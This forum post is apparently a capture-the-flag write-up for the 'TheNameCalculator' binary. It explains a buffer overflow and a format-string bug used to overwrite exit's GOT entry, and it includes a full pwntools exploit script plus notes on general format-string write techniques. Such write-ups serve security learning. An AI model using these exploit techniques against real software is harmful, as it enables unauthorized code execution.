TheNameCalculator题解

打印 上一主题 下一主题

主题 845|帖子 845|积分 2535

TheNameCalculator题解

题目链接:TheNameCalculator
题解

首先看程序开启的保护,有Canary和NX栈不可执行。

IDA打开程序,shift+F12查看字符串,发现有"Here is your flag:"。点进去通过交叉引用找到该字符串在superSecretFunc()函数中,该函数可以执行"cat flag"命令获得flag。使用交叉引用发现该函数没有被任何地方调用,所以这道题就是想办法修改某个执行地址为这个函数地址,从而执行该函数。

程序main函数中存在缓冲区溢出,通过溢出buf修改变量v4的值,从而执行secretFunc()函数,这很容易实现。

secretFunc()函数第22行存在格式化字符串漏洞,buf内容为15行用户输入后经过第18、19行加密后的内容。程序利用的方法是修改exit_got的地址为superSecretFunc()函数地址,使程序在退出时执行相应函数。

通过gdb调试,在0x80486d5处下断点,发现字符串偏移为0xff9143f0-0xff9143c0=0x30=48,即字符串偏移位置为48/4=12。

还需要注意,buf[7]保存的是Canary,如果在伪代码看不出的话可以通过汇编代码看出来。函数最后进行了一系列比较,前两个验证返回地址是否一致,第三个验证Canary是否一致。

所以输入的数据限制在28字节内,构造格式化漏洞利用payload。其中superSecretFunc()函数地址为0x08048596,exit_got位于0x804a024,exit_got指向的地址前2字节也是0x0804,所以只需要覆写低2字节,即将0x804a024开始的2字节改为0x8596(34198).
  1. payload = b"%34198c%16$hnaaa"+p32(0x804a024)
复制代码
此外,因为程序会对用户输入的数据进行加密,所以我们需要对输入进行处理使其经程序加密后为我们上面构造的payload。
最终exp如下
  1. from pwn import *
  2. context.log_level='debug'
  3. p = remote('redirect.do-not-trust.hacking.run',10311)
  4. payload = b'a'*0x1c + p32(0x6a4b825)
  5. p.recvuntil('name?\n')
  6. p.send(payload)
  7. def encode(payload):
  8.     buf = list(payload)
  9.     for i in range(0,len(buf)-4):
  10.         temp = bytes(buf[i:i+4])
  11.         tmp = u32(temp)^0x5F7B4153
  12.         buf[i:i+4]=list(p32(tmp))
  13.     return bytes(buf)
  14. payload = b"%34198c%16$hnaaa"+p32(0x804a024)
  15. payload = encode(payload)
  16. p.recvuntil('please\n')
  17. p.send(payload)
  18. p.recv()
  19. p.interactive()
复制代码
最终获得flag.

收获

1.重温了格式化字符串漏洞利用方法
形式:printf(user_input)
利用
泄露栈上地址:%[order]$p
任意内存覆盖:%[num]c%[order]$n[padding][addr]
需要计算格式化字符串相对于传入printf参数的栈上位置的相对偏移off_order,num为需要写入的值,order为写入地址相对栈参数位置相对偏移,padding为保证前面为4/8整数倍,addr为写入地址。n表示写入4字节,hn为2字节,hhn为单字节。
也可使用pwntools的fmtstr_payload()函数
  1. # 将addr地址处值改为value,order为格式化字符串偏移
  2. fmtstr_payload(order,{addr:value})
复制代码
2.python类型转化
bytes类型不能直接修改元素的值,可以用list()转为列表修改。
列表转为bytes类型可直接使用bytes()函数。
3.plt与got表
plt处的内容为一个jmp got表值
  1. .plt:08048470                 jmp     ds:off_804A024
复制代码
相应got.plt表位置对应了一个地址
  1. .got.plt:0804A024 off_804A024     dd offset exit   
复制代码
可以通过修改函数got.plt值实现控制流转移。

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

麻花痒

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表